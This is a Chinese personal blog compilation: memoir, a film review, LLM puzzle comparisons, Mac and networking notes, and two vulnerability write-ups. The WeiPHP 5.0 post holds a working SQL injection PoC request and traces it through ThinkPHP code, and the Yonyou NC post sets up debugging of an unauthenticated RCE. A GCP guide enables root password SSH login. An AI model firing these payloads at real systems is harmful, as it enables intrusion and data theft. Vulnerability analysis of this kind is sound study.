上一次见到外婆已经是两年半前（2022年）的国庆了，那天傍晚，夕阳日暮，晚风咻咻然，我开着小摩托，拍下了这一刻，我永远记得，这成为了最后一次见外婆的记忆。两个月后，外婆在一个日常的早晨感到有些不适，于是去常光顾的诊所输液，没想到晚上就进了ICU，第二天就让家属送回家了。尽管身前饱受多样病痛多年折磨，但外婆平生行善积德、与人为好，在生命最后一刻没有持续太长久的痛苦。

妈妈说，外婆去拜佛了。

我常觉得妈妈拥有一些超然的诗意与浪漫。虽然妈妈是一个未曾进过学堂的农村妇女，但她总是表现出超脱的聪明，凭借生活和电视，也能学会普通的算术和几句口头普通话，为了我们小时候的家长签字也学会了写自己的名字。在数字化年代，也会用智能手机应付日常生活与交际。在我们逢年过节度假结束，离家返工时，她常常说，人就像鸟一样，早上还在家这呢，晚上就到了广州珠海那去了。

人就像鸟一样，或者囚于笼中；或者不停地飞，一生只能落地一次；或者天高任鸟飞，偶然停下来歇歇，驻足在我们葡萄枝嫩叶般的家，驻足在码头上我们停着的船。

但愿人长久，千里共蝉娟。

木棍难题和洗车悖论

Sun, 10 May 2026 09:47:38 GMT

🔑

各家大模型对人类历史上的史诗级难题——木棍通过问题及洗车走路去还是开车去的解答

洗车

OpenAi

gpt-5.3-instant

gpt-5.4-thinking

gpt-5.4-pro

只有gpt-5.4-pro推理出来了，耗时4m3s

木棍

❌小米mimo-v2-pro/mimo-v2-flash

想去洗车，但是考虑下距离，我是走路去好还是开车去好呢

Deepseek R1

思考200s，左右脑互搏

OpenAI

gpt-o4-mini

仅仅思考4s，可以说是不假思索了

（没资格使用o3～扣扣搜搜的openai）

那我问你，要是10m的木棍呢？

Gemini

我们看看鸡哥怎么说

2.5 Flash Preview 05-20

带思维链思考了9.5s后

2.5 Pro

值得肯定！

（思考时长64.8s）

Cladue Sonnet4

prompt 使用 richards199999/Thinking-Claude/blob/main/model_instructions/v5-lite-20241124

结果是……倒了

Kimi

开启长思考

也不是不行….

qwen

qwen3-235b-a22b-07-25

这个回答似乎还可以

TBD

google cloud通过第三方工具密码登陆ssh

Sun, 10 May 2026 09:47:38 GMT

1. IAM 权限与系统角色 (解决 sudo 报错)

操作： 在 Google Cloud 控制台的 IAM 和管理 → IAM 页面，为账号添加 Compute OS Admin Login（计算引擎操作系统管理员登录）（搜索）角色。
具体：
1. 在 IAM 列表中找到对应用户：
2. 修改已有账号的权限：在用户列表中找到该账号，点击最右侧的 编辑图标（铅笔形状）。
3. 为账号添加 Compute OS Admin Login（计算引擎操作系统管理员登录）（搜索）角色。

保存：点击 “保存” (SAVE) 按钮生效。

目的： 解决最初 sudo 提示 "I'm afraid I can't do that" 的权限阻断，让你拥有在网页终端提权 root 的合法身份。

2. 虚拟机元数据调整 (解除云端托管)

操作： 在虚拟机详情页的“元数据”部分，手动添加键值对 enable-oslogin = FALSE。
具体：
1. 进入 Compute Engine -> 虚拟机实例。
2. 点击目标虚拟机的名称详情。
3. 点击 “修改” (EDIT)。
4. 在 “元数据” (Metadata) 部分，找到 enable-oslogin。
5. 将其值改为 FALSE（如果没有这一项，请添加 enable-oslogin = FALSE）。
6. 点击保存。
目的： 强制关闭 Google 的 OS Login 身份验证模式。如果不关闭此项，系统会优先走 IAM 密钥验证，从而忽略你手动设置的 root 密码。

3. 修改 SSH 配置文件 (开启权限)

设置密码： sudo -i 切换到 root ，然后使用 passwd 命令为 root 账号设置了登录密码。
操作： 登录网页 SSH 终端后，修改了 /etc/ssh/sshd_config 文件：
PermitRootLogin yes (允许 root 登录)
PasswordAuthentication yes (允许密码验证)

重启：reboot

4. 清理模块化配置干扰 (最关键的突破)

操作： 删除了 /etc/ssh/sshd_config.d/ 目录下的所有 .conf 文件（如 50-cloud-init.conf）。
具体：

确认第3步的修改是否有生效

sudo sshd -T | grep -E "passwordauthentication|permitrootlogin"

如果输出显示 passwordauthentication no，说明配置文件修改没生效（被覆盖了）。
如果输出显示 yes 但你还是连不上，说明是 PAM 或 OS Login 在底层拦截了验证。

删除

# 进入 root
sudo -i

# 查看有哪些干扰文件
ls /etc/ssh/sshd_config.d/

# 删除或清空这些干扰配置（它们通常强制设置了 PasswordAuthentication no）
rm -f /etc/ssh/sshd_config.d/*.conf

强制在主配置中置顶

# 使用 sed 直接修改并确保没有重复项
sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config
sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/' /etc/ssh/sshd_config

# 或者直接在文件最末尾追加（确保覆盖效果）
echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config

重启

# 重启 SSH 服务
systemctl restart sshd

# 再次验证配置是否真的变成了 yes
sshd -T | grep -E "passwordauthentication|permitrootlogin"

# 或者
reboot

原因： 这是 2026 年新版镜像的特性。这些子目录里的配置优先级高于主配置文件。即使主文件改了，子目录里的 PasswordAuthentication no 也会把你的修改覆盖掉。

awesome mymac

Sun, 10 May 2026 09:47:38 GMT

我的设备

💻

Apple MacBook Pro 2021 with Apple M1 Pro chip (14-inch, 16GB RAM, 512GB SSD)

🕸️ 浏览器

chrome

优点：

chrome强大的插件生态，有无法取代的地位。
Gemini in chrome，对网页的总结和直接引用对话具有独到的优势。全局快捷键呼起gemini。
标签页拆分试图

缺点：

权限管理、内存管理上略为臃肿
阅读模式无法独占整个标签页

safari

优点：

界面依然是简洁的，阅读模式也很好，chrome莫名其妙的，阅读模式无法独占整个标签页。
点击地址栏才显示书签，这个功能我觉得非常实用，非常人性化，不需要显示书签栏，不影响页面阅读

缺点：

缺少一些好用的插件
无标签页拆分视图

可以说平分秋色，各有千秋，都没有100分

arc

arc试用不习惯，主要是背景，在浏览网页的时候标签页周边有一圈其他颜色，并不沉浸，并且地址栏也在左边边栏，整体视觉太偏左了。

使用过程中发现一些扩展选项（ZeroOmega）无法打开，遂弃用。

📒 笔记软件

notion

多端同步，block结构，用nextjs进行网站部署和同步，满足很多需求。其他笔记软件虽然能做到更简洁更专注，但多端同步和图片插入同步总是个问题。

这个blog就是notion➕nextjs-notion-starter-kit➕vercel部署的

miaoyan

本地的md格式笔记软件，除了obsidian和typora之外，还有一个简洁美的miaoyan

https://github.com/tw93/MiaoYan

作者的周刊也挺不错的，也是促使我写这篇文章的动力

https://weekly.tw93.fun/

🔋 电源管理

Aldent

https://apphousekitchen.com/aldente-overview/

可以限制充电上限。

对我来说最主要是可以看到充电功率，部分充电头可以看到型号和参数。

翻译

沉浸式翻译

非常好用的浏览器翻译插件，双语对照，自定义译文样式，大模型接入翻译

可以直接使用官方提供的免费GLM-4.7-flash接入

选词翻译的悬浮快捷键可以只显示一个小圆点，不碍眼

还能网页PDF翻译，双语对照翻译后保存为文档，想必对文献阅读会很有帮助

唯一的缺点就是没有桌面app可以实现全局翻译

Bob

所以就用到了这个全局翻译的工具，每天都有一定的免费额度。

可以划词翻译、截图翻译

RSS

Qi Reader

https://www.qireader.com/

🔗 QiReader - A Modern Web RSS Reader

一个只有web端的阅读器，简约无广告，没有复杂的设置和多余的组件，专注于阅读。

结合pwa，在电脑、手机、平板多设备上都可以实现统一ui，快速同步

PS：丰富的主题样式，结合自带的「霞鹜文楷」字体，阅读体验挺好的

RSSHUB

rss源是用的RSSHUB官方镜像自建

🔗 RSSHub

编辑器

notepad--

相当于windows上的notepad++，功能齐全，速度飞快，很轻便。用来文本查看，临时记录，打开文件夹简单查看产品日志

支持macos、uos、windows、Linux

🔗 GitHub - cxasm/notepad--: 一个支持windows/linux/mac的文本编辑器，目标是做中国人自己的编辑器，来自中国。

VSCode

神器不必多说，涉及到代码的时候多用这个做编辑，主要推荐一个主题，扩展商店直接搜就可以了，对眼睛和审美比较舒适的主题

鼠标优化

Mac Mouse Fix

众所周知，mac的触控板手势很方便，之前用鼠标的时候常常要结合触控板来使用。这个软件可以自定义鼠标手势替换触控板，这样用外置鼠标就可以完全替代触控板了

然鹅，mac的鼠标逻辑不管怎么优化都不如在windows上丝滑，回报率很低，现在是以屏幕刷新率为上限，MacBook Pro上限也只有125hz

Tailscale 与 Clash Verge 共存

Sun, 10 May 2026 09:47:38 GMT

日期: 2026-02-13

环境: macOS (Darwin), Tailscale, Clash Verge (TUN 模式)

1. 问题现象

国内网站无法访问: Tailscale 和 clash verge tun 模式共存，Chrome 浏览器无法打开weibo、Bilibili 等国内网站，但命令行 ping 正常。
Tailscale 内网不通: 虽然 tailscale ping 能通（走 DERP 中继），但无法通过 SSH 连接内网服务器 (100.x.y.z)，提示 Operation timed out。
DNS 解析异常: scutil --dns 显示 Tailscale 的 DNS (100.100.100.100) 抢占了系统首选解析器，导致国内域名解析失败或被错误路由。

2. 根因分析

DNS 冲突 (MagicDNS 抢占): Tailscale 默认开启 "Override local DNS"，导致 macOS 将所有 DNS 请求优先发往 Tailscale 的虚拟接口。由于 Clash 也在处理 DNS，两者发生冲突，导致国内域名无法正确解析或被阻断。
路由/防火墙拦截 (Ghost PF Rules): Clash Verge 的 TUN 模式在开启时会修改 macOS 的包过滤防火墙 (pf) 规则以接管流量。在关闭 TUN 模式或切换配置时，部分残留的 pf 规则错误地拦截了发往 Tailscale 网段 (100.64.0.0/10) 的 TCP 流量（如 SSH），尽管 ICMP (Ping) 协议未受影响。

3. 解决方案

A. 解决 DNS 冲突 (已执行)

强制 Tailscale 不接管系统 DNS，仅负责内网路由。

# 停止并重置 Tailscale 配置，添加 --accept-dns=false 参数
/Applications/Tailscale.app/Contents/MacOS/Tailscale up --accept-dns=false --reset

效果:

macOS 的 DNS 解析权交还给 Clash/系统。
国内网站访问恢复正常。
Tailscale 内网域名解析需依赖本地 hosts 或特定 DNS 配置，但 IP 直连不受影响。

B. 解决 SSH 连接超时 (已执行)

清理 macOS 系统防火墙中残留的阻断规则。

# 清除所有 pf (Packet Filter) 规则
sudo pfctl -F all

# (可选) 重新加载默认规则
sudo pfctl -f /etc/pf.conf

效果:

SSH 连接 (ssh ubuntu@100.104.18.30) 成功建立。
TCP 流量不再被错误拦截。

C. 优化 Clash Verge 配置

在 Clash 配置文件或 Merge 配置中显式排除 Tailscale 网段。

在 Clash 配置文件 (config.yaml 或 Merge) 中添加（建议，未执行）:

tun:
  enable: true
  stack: system # 或 gvisor
  # 关键：排除 Tailscale 网段，防止被 TUN 接管
  inet4-route-exclude-address:
    - 100.64.0.0/10

或者在 Clash 规则 (Rules) 中添加以下直连规则（优先级需置顶，确保 Tailscale 流量直连）：

rules:
  - PROCESS-NAME,Tailscale,DIRECT
  - DST-PORT,41641/udp,DIRECT
  - IP-CIDR,100.64.0.0/10,DIRECT
  - DOMAIN-SUFFIX,ts.net,DIRECT

4. 验证结果

Web 浏览: 国内外网站均正常。
内网互通: ssh -i ... ubuntu@100... 连接成功。
共存状态: Tailscale (无 DNS 模式) + Clash Verge (TUN 模式) 现已正常共存。

yearly-2026

Sun, 10 May 2026 09:47:38 GMT

20260314

一些不敢多听的歌

带有沉重的悲伤，说不清是什么情绪，不只是寻常的男女之情，像是仿佛触及到心里自我认知中的消极绝望、在世界角落中的孤独和与生俱来的哀愁。

你在何地
夜天花板有这段戏总关不上心里的放映机
的娓娓道来
推进到高亢的
深宵冰冷情人你在何地
你在何地……我好孤单，而你又是谁，我不知道
玻璃之情
以前听仿佛坠入悲海，不能呼吸。
如果你太累及时地道别没有罪
刚知道作曲就是Leslie，又笼罩了一层悲
梦到内河
当年听完真的不敢再听一次的歌…
简洁的乐器组合，主歌急促的钢琴为主，重要的咬字上加以大鼓和敲击（钟类？青铜器？）乐器，进入副歌弦乐提琴加入主导情绪，哀伤婉转，配合林夕节奏快又碎的歌词，混乱中的和谐与突破，似要冲出某种禁锢，高潮后收尾又回归冷静。
自那天遗下我我早化作磷火

其实都是Leslie的歌，原来转眼又要到4.1了，R.I.P

20260225

又是一年离家，俗话说充电器一拨又是一年，今年离开时没有太多波澜，在乡里逛也没有之前那么浓重的情绪，也许是身上有更明确的愿望，更加自洽了。离家之际把情绪寄托在以下字字句句中。

乡愁

乡愁是一方茶盘

他在注水氤氲

我在杯底看叶

乡愁是一张毛巾

她在祝祷里

我在行囊中

乡愁是一列火车

他在车尾乡

我在车头愁

乡愁是一勾娥眉月

她在月眉上

我在月光下

情与义值千金

Sun, 10 May 2026 09:47:38 GMT

看完《给阿嬷的情书》，久久难以平息的除了感动，还有一种很复杂的激动。

这种激动不只来自一个影迷看到好电影时的惊喜。更私人的部分在于，我也是潮阳人。潮阳这个地方，在潮汕内部一直是独树一帜的存在。很多时候，不用问你从哪里来，一开口，别人就听出来了。那种口音太鲜明，太有脾气，像是一个地方长在喉咙里的印记。

所以当一部主要使用潮阳话的电影出现在大银幕上，它带来的震动不只是乡音被听见，而是一个常常只存在于日常、饭桌、街巷和老人絮语里的地方，忽然被电影认真地托了起来。

更难得的是，《给阿嬷的情书》并没有停在地方性里。它当然是潮汕的，是潮阳的，是关于侨批、方言、迁徙和家族记忆的电影。但它最后抵达的地方并不窄。语言可以不通，情感却有自己的路。观众未必听得懂每一句潮阳话，却能听懂等待，听懂情义，听懂一个人把一生藏在日常里的那种沉默。

这也是这部电影真正让我惊喜的地方。它没有把爱拍得很轻，也没有把观众看得很浅。

这些年国内影视行业不容易，观众不买账，很多时候不是观众变得多挑剔，而是作品先不尊重观众。它们把爱重复性地拍成两个人谈恋爱，反复拉扯，把情感拍成误会、争吵、慢镜头和崩溃大哭，好像不把情绪端到观众脸上，观众就不会懂。

但爱明明不是这么单薄的东西。

爱可以跨越时间，也可以跨越空间。它可以是男女之情，也可以是亲情、恩义、责任、亏欠。它可以发生在年轻人身上，也可以发生在老人身上，也可以发生在他们之间。爱不一定要说出口，不一定要拥抱，不一定要哭到撕心裂肺。片中没有任何尺度镜头，没有亲吻或亲热，但我们依然能深切感受到他们之间浓烈的爱。情义本身就是一种爱，有时候比爱情更重、更难承受，而电影让这种爱自然地流淌出来，通过眼神、细节和日常守候，让观众触碰到最真实的情感。

《给阿嬷的情书》难得的地方，就在于它真的相信这些。它相信观众能看懂复杂的感情，能看懂沉默，能看懂一个人没有流泪时心里翻过的海。哪怕全片有大量素人演员，甚至主演都不是在从事影视行业相关的工作或学习，只要情感是真的，生活是真的，观众就会跟上。电影不是靠工业包装讨好人，而是靠那股真气撑住了自己。

导演在采访里提到李安，我看到这里时有一点会心。

李安的电影常常动人，是因为他的文化处境很复杂。他不是单纯站在传统里说传统，也不是站在外面回头观看东方。他身上有两种力量长期拉扯。中原文化给了他骨相，让他知道什么是家、什么是规矩、什么是忍与让、推与收；外来文化给了他开放的思想视角和表现手段，让他能把这些内核充分展现在作品里。所以他的电影总有一种双重的目光：既亲近，又开放；既温柔，又精准。

蓝鸿春导演在《给阿嬷的情书》里，也有这种很珍贵的距离感。

乡愁就是一种人的内核与发展的矛盾。他没有把潮汕拍成一个供人猎奇的地方，也没有把乡愁拍成廉价的怀旧。他更像是站在故乡里面，又稍微退后了一点。退后之后，才看见那些熟悉的东西原来并不寻常。侨批不是旧纸，方言不是口音，阿嬷手上的活计也不是民俗点缀。它们都是时间留下来的证据，是一代人如何活过、忍过、等过的痕迹。

我还会想到毕赣。

毕赣和蓝鸿春当然不是同一种导演，但他们身上都有一种扎根乡土的真诚。小制作，本土演员，熟悉的街巷，带着泥土味的人物关系。这些东西也许不够精致，不够“电影工业”。但电影最重要的从来不只是服务和环境。就像吃一餐饭，桌子可以朴素，碗可以普通，但味道不能假。

一碗叉烧饭，如果真的用心，也可以成为「黯然销魂饭」。你相信食客的舌头，食客自然会知道你有没有下功夫。

回到电影本身，《给阿嬷的情书》最动人的，其实是它把一段复杂的情感关系拍得很轻，又很重。

晓伟去泰国寻找传闻中的阿公，表面看是一次寻亲，也带着一点年轻人的现实狼狈。他不是怀着什么宏大的使命出发，他有债务，有逃避，有自己的小算盘。可正是这样一个不够高尚的出发点，反而让后面的真相更有力量。因为人生很多重要的相遇，本来就不是从纯粹开始的。

片中狄功先生教学生读“红豆生南国，春来发几枝”，又让学生在信里找相思。可看到后来才发现，“南枝”这个名字本身就像一枚暗扣。南枝不是相思的注释，她几乎就是相思长出来的形状。

三个人的关系也藏在名字中。一个是木，一个是枝，一个是叶。一切起源于木，又由枝把木和叶连接起来。枝不是根，却替根传递了生命；枝不是叶，却默默托举了叶。这样的关系如果处理不好，很容易变成狗血。可电影没有往那个方向走。它没有急着审判，也没有急着煽情。它只是慢慢把几十年的误会、等待和亏欠摊开，让观众自己看见。

最让我受不了的，是阿嬷的平静。

全片下来，阿嬷经历的是六十年的坚守，四十年的误解。谜团解开，某种意义上像是“重遇故人”。按一般电影的拍法，这里太容易安排一场大哭，一段控诉，一个迟来的拥抱。可阿嬷没有。她没有崩溃，没有质问，没有把心里的波澜表演出来。

她还是在做事，她说「她去看橄榄煮好了没」。

绣花，打橄榄，煮橄榄。

那些手上的活，一件接一件，像她这些年过日子的方式。人活到后来，好像很多巨大的事都不能立刻改变生活。悲伤来了，饭还是要煮。真相来了，手里的活还是要做。日子并不会因为一封迟到的情书就停下来。人也正是在这种不停下来的生活里，把最深的痛慢慢吞进去。

这让我想起自己的外婆。

在外婆伴着流星飞向太空后的那些日子里，我的外公和妈妈也很平静。平静得像什么都没有发生。照常生活，只是做事，说话，吃饭，处理后事。可几十年的相依为命，怎么可能不起波澜呢。只是有些人的悲伤不是流出来的，是沉下去的。沉到身体里，沉到手上的动作里，沉到以后每一个平常的日子里。大音希声，流水静深。

所以真正的感人，从来不在刻意制造的错过和误会，也不在慢镜头里撕心裂肺的哭喊。感动一定是从心底自己长出来的。不是场面越大，戏就越好。

「唔系大声就好戏㗎喇啊杨师傅。」

电影里还有一个情节，影院里很多人笑了。蟑螂煮水当偏方。这个桥段乍看荒诞，甚至有点滑稽。可我笑不太出来。

在贫穷、闭塞、医疗资源匮乏的地方，人真的会把希望寄托在许多今天看来不可思议的东西上。不是他们愚昧到可笑，而是人在走投无路的时候，什么都愿意抓住。尤其是父母面对孩子的病痛时，哪怕只是一点口口相传的偏方，也可能成为他们最后能做的事。

可怜天下父母心。有时候从置身事外的角度看，那些偏方荒诞得像王菀之歌里唱的：谁曾在病人的嘴，用怪物当作圣水。可在当事人那里，那不是怪物，是没有办法里的办法。

这也是电影的好。它没有把乡土拍得干净漂亮，也没有把贫穷拍成可以消费的苦难。它知道生活里本来就有这些不体面、不科学、甚至有点骇人的东西。但它也知道，这些东西背后常常不是猎奇，而是人的无力。

再说语言。

我一直觉得潮汕话里有很多误传，也有很多争议。以前很多人不识字，认识很多事物是以发音来记的。没有文字作为标准，口口相传，音就容易变。一个字从这里传到那里，可能就换了样子。比如“走仔”和“早仔”的争议，有些人不承认“走掉的孩子”那层意思，也有些地方确实说“早仔”。潮汕地区太古老，迁徙也太复杂，不同地方保留了不同的古汉语发音和语法。很多事情很难用一个标准答案压平。

所以我更愿意尊重差异。

导演大量采用潮阳话作为主语言，当然有他作为潮阳人的私心。但我觉得不止如此。潮汕本来就是十里不同风，百里不同俗。潮汕三市之间，各村各镇都有明显口音差别。如果粗略来说，可以按韩江、榕江、练江这些水系去总结口音派系。河流不只是地理，靠水而居，它也影响了人的往来、村落和语言。于是同区可能不同音，不同市也可能有相近的口音。

潮阳话属于练江这一支。它在潮汕话里有一种很明显的重量感。音调重，落点狠，说起来有劲，也显得很粗鲁。别的地方的潮汕话，有些听起来像唱歌，轻一点，软一点；潮阳话很多时候像吵架，哪怕只是正常聊天，也似在吵架。

这种特色放进电影里很有用。

它能出喜剧效果，因为重音调和生活化对白撞在一起，它能撑住冲突，因为潮阳话一旦急起来，人物身上的火气和委屈会更容易冒出来。片中南枝爸爸和外国人吵架保宅子的段落，就很能看出口音的情绪差异。如果南枝爸爸是潮阳口音，那种放狠话的气势会更冲，更像把人顶到墙角。但他不是潮阳口音，所以吵起来反而被收敛了，带着一点温柔。这不是好坏问题，而是语言本身携带的性格不同。

相比导演前两部作品，它们更多围绕家庭矛盾与和解，映射小地区的真实家庭生活。以我的角度来看，没有任何一部电影能给我这种真切体验，但也因此受众局限明显。这一次，导演不再把一个小家庭当作主线，而是把更多不同家庭和多样的人物关系浓缩进来，把主线放到爱与情义上，而不是某一个小家的争执与和解。不再需要声嘶力竭的爆发，不再需要传统的闭合式大团圆结尾，相反，他安排了一个足以留名影史的结尾（妄言了）。

最后一个镜头：阿嬷在泰国坐车，摇下车窗，望向窗外。一个主观视角镜头随阿嬷平移，她看到了她寤寐思服的爱人，看到了他在思念她、在拼搏奋斗。一转角，又遇到还未写下故事的南枝在等车，最后再定格住给爱人买完礼物满心欢喜，充满干劲带着笑容重新出发的木生。用阿嬷的视角回顾故事的开始，就在她来为一切画上句号的时候，他们穿越了时空，在同一片天空下。

WeiPHP 5.0 sql注入漏洞bind_follow

Sun, 10 May 2026 09:47:38 GMT

0 前言

WeiPHP5.0是一个开源，高效，简洁的移动应用系统，它实现一个后台同时管理和运营多个客户端。WeiPHP5以前的版本都是基于ThinkPHP3.2版本开发，5.0以后升级了ThinkPHP5的架构。

WeiPHP在5.0版本存在多个SQL注入漏洞，分配了CNVD编号，有一定的影响力，然而网上只流传着poc，没有相关的分析干货，基于学习探究的目的，笔者试着就其中一个SQL注入的漏洞进行分析。

漏洞来源：

🔗 WeiPHP5.0 SQL注入漏洞2_N0puple的博客-CSDN博客_weiphp

1 poc

POST /weiphp5/public/index.php/home/Index/bind_follow HTTP/1.1
Host: 192.168.249.128:81
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en;q=0.7,zh-HK;q=0.6,en-US;q=0.5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

uid%5b0]=exp&uid[1]=)%20and%20updatexml%0a(1,concat(0x7e,/*!user*/(),0x7e),1)--+

2 分析

是一个免登录的前台sql，危害较大

先根据报错信息定位漏洞入口文件

进入/application/home/controller/Index.php

对thinkphp架构熟悉的话，可以知道 I 函数就是一个过滤输入的函数，先ctrl 跟进看看代码

来到 application/common.php

继续进入 input 函数

input 首先判断输入的数据是否以 ? 开头，是的话去掉 ? ,并将 $has 赋为 true

接着找数据中是否有 . ，有的话以 . 为界限分割数据

最后看看 has 函数， thinkphp/library/think/facade/Request.php

可见 I 函数对注入没什么过滤作用

接着进到 wp_where 函数

遍历 $map 数组，由于传入的只有两个值，这段代码会进入elseif

如果$value[0]=='exp' ，并且!is_object($value[1] ，进入Db::raw thinkphp/library/think/Db.php

注意到这是静态方法，Db.php有一个魔术方法__callStatic() ，其会在调用没有声明的静态方法时自动调用，作用和原型都类似于 __call() ，并且由于Db.php没有继承任何类，static::connect 在这里调用的是当前类的 connect 方法

打下断点发poc跟进

传入回调的 $method 和 $args

进入 connection 构造函数（\think\db\Query）

getConfig 返回数据库前缀

进入raw函数

进入raw函数所在的类 think\db\Expression

初始化处理传入值后，返回到 \think\db\Query::where

不断步入到 Index.php，进入 \think\db\Query::find

继续跟进 find() 函数（ \think\db\Connection::find ），查找单条记录的函数，分析查询表达式，最后生成查询sql语句

select 函数解析并格式化查询语句

跟进 select 函数，逐个跟进每个 parse 函数

顾名思义，parseTable 函数返回 table名，跟进前面几个函数都是返回一些格式化信息，跟到parseWhere 关键函数

接着到 \think\db\Builder::buildWhere ，遍历 $val 数组的值，传给 $value数组，这里的publicid是默认的

array_shift 函数的作用是删除数组中的第一个元素，并且返回被删除元素的值，这里的作用可以理解成把数组中的值逐个取出做sql解析

$filed 赋值为 publicid 后传入 parseWhereItem 函数

经过array_shift 函数后 $value 也就变成了 {"=", ""} ，$exp 被赋值为 =

接着进入 \think\db\Query::bind 函数

返回一个 name 值 ThinkBind_1_

\think\db\Builder::parseWhereItem 中赋值 :ThinkBind_1_

经过 \think\db\Builder::parseCompare 处理，最终 \think\db\Builder::parseWhereItem 返回 `publicid` = :ThinkBind_1_

到这里拿到sql语句前半段

接着返回到遍历数组的语句，继续传入 $val 的第二个键值对，也就是poc中post data传入的 uid[0]=exp&uid[1]=)%20and%20updatexml……

这里开始与前面的步骤一样，经过 array_shift 函数处理， $field 赋值为 uid ，并且数组变成 {"exp", think\db\Expression} ，后者即传入的恶意sql语句 ) and updatexml\n(1,concat(0x7e,/*!user*/(),0x7e),1)--

重复上面解析publicid的一系列函数处理，一步步将 think\db\Expression 的值解析出来，赋值给value

最终在 \think\db\Builder::parseExp 处拼接左右括号和 $key ，用 getValue 取值

而 getValue 函数直接返回 value 的值 (\think\db\Expression::getValue)，中间的函数并没有对传入的uid数组进行相关的字符过滤、转义或者检查等操作

value 闭合括号即产生了注入

与上文一样在\think\db\Builder::parseWhereItem 返回解析后的值

接着把两次处理后的值拼接起来

作为\think\db\Builder::parseWhere 的返回值，回到 select 函数完成后续的 parse 函数，再返回给前文的select语句

最终的 $sql 语句

SELECT * FROM `wp_user_follow` WHERE  `publicid` = :ThinkBind_1_  AND ( `uid` ) and updatexml\n(1,concat(0x7e,/*!user*/(),0x7e),1)--  ) LIMIT 1

然后执行查询 $sql

后面初始化、连接数据库等就不赘述了

到这里的堆栈

Connection.php:644, think\db\Connection->query()
Connection.php:844, think\db\Connection->find()
Query.php:3132, think\db\Query->find()
Index.php:161, app\home\controller\Index->bind_follow()
Container.php:395, ReflectionMethod->invokeArgs()
Container.php:395, think\Container->invokeReflectMethod()
Module.php:132, think\route\dispatch\Module->think\route\dispatch\{closure}()
Middleware.php:185, call_user_func_array:{C:\ALLHERE\phpstudy\phpstudy_pro\WWW\weiphp5\thinkphp\library\think\Middleware.php:185}()
Middleware.php:185, think\Middleware->think\{closure}()
Middleware.php:130, call_user_func:{C:\ALLHERE\phpstudy\phpstudy_pro\WWW\weiphp5\thinkphp\library\think\Middleware.php:130}()
Middleware.php:130, think\Middleware->dispatch()
Module.php:137, think\route\dispatch\Module->exec()
Dispatch.php:168, think\route\Dispatch->run()
App.php:432, think\App->think\{closure}()
Middleware.php:185, call_user_func_array:{C:\ALLHERE\phpstudy\phpstudy_pro\WWW\weiphp5\thinkphp\library\think\Middleware.php:185}()
Middleware.php:185, think\Middleware->think\{closure}()
Middleware.php:130, call_user_func:{C:\ALLHERE\phpstudy\phpstudy_pro\WWW\weiphp5\thinkphp\library\think\Middleware.php:130}()
Middleware.php:130, think\Middleware->dispatch()
App.php:435, think\App->run()
index.php:55, {main}()

3 利用情况

yonyou nc6.5 InvokerServlet 任意类调用执行漏洞调试

Sun, 10 May 2026 09:47:38 GMT

前言

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。

用友NC6.5中的nc/bs/framework/server/InvokerServlet.class 存在未授权任意类调用漏洞，该漏洞通过构造特殊的数据包调用NC自有类可导致反序列化或命令执行。其中可利用BeanShell接口执行任意命令，漏洞编号CNVD-2021-30167。

安装

windows10 x64 jdk1.7.0_21

下载nc6.5，解压后启动安装脚本 path\NC6.5\yonyou_nc\setup.bat

1、全选安装产品

2、安装完成后自动启动path\yonyou\home\bin\sysConfig.bat

1）配置服务器信息，点击读取，修改需要自定义的参数后保存

2）这里不添加任何数据源（数据库）和授权，直接 部署EJB 即可

3）运行path\yonyou\home\startServer.bat 无报错即可

准备

导出目录下所有jar包，加载到idea中，配置idea远程调试参数

在启动yonyounc时添加jdwp参数

C:\java\jdk1.7.0_21\bin\java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=192.168.249.1:5005 -server -Xmx768m -XX:PermSize=128m -XX:MaxPermSize=512m -Djava.awt.headless=true -Dfile.encoding=GBK -Duser.timezone=GMT+8 -Dnc.server.name=server -Dnc.server.startCount=0 -DNC_JAVA_HOME=$JAVA_HOME -Dorg.owasp.esapi.resources=C:\yonyou\home/ierp/bin/esapi -Dnc.bs.logging.format=text -Dnc.server.location=C:\yonyou\home -Drun.side=server -Dnc.run.side=server -cp C:\yonyou\home\starter.jar;C:\java\jdk1.7.0_21\lib\tools.jar;C:\yonyou\home\ant\lib\ant-launcher.jar;C:\yonyou\home\lib\cnytiruces.jar nc.bs.mw.start.AloneBootstrap start

调试

servlet-mapping

moduleName

根据poc在 bsh/servlet/BshServlet.class$doGet() 方法下断点，跟进到 nc/bs/framework/server/InvokerServlet.class$doAction() 方法

关键代码

						pathInfo = pathInfo.trim();
            String moduleName = null;
            String serviceName = null;
            int beginIndex;
            if (pathInfo.startsWith("/~")) {   //按/~分割字符获取moduleName和serviceName
                moduleName = pathInfo.substring(2);
                beginIndex = moduleName.indexOf("/");
                if (beginIndex >= 0) { //如果第三个字符之后有斜杠则斜杠之前为moduleName，后为serviceName
                    serviceName = moduleName.substring(beginIndex);
                    if (beginIndex > 0) {
                        moduleName = moduleName.substring(0, beginIndex);
                    } else {
                        moduleName = null;
                    }
                } else {
                    moduleName = null;
                    serviceName = pathInfo;  //如果无斜杠则moduleName为空，pathInfo作为serviceName
                }
            } else {
                serviceName = pathInfo;
            }

            if (serviceName == null) {
                throw new ServletException("Service name is not specified");
            }

            beginIndex = serviceName.indexOf("/");
            if (beginIndex < 0 || beginIndex >= serviceName.length() - 1) {
                throw new ServletException("Service name is not specified");
            }

            serviceName = serviceName.substring(beginIndex + 1);
            Object obj = null;

            String msg;
            try {
                obj = this.getServiceObject(moduleName, serviceName); //获取服务对象
            } catch (ComponentException var76) {
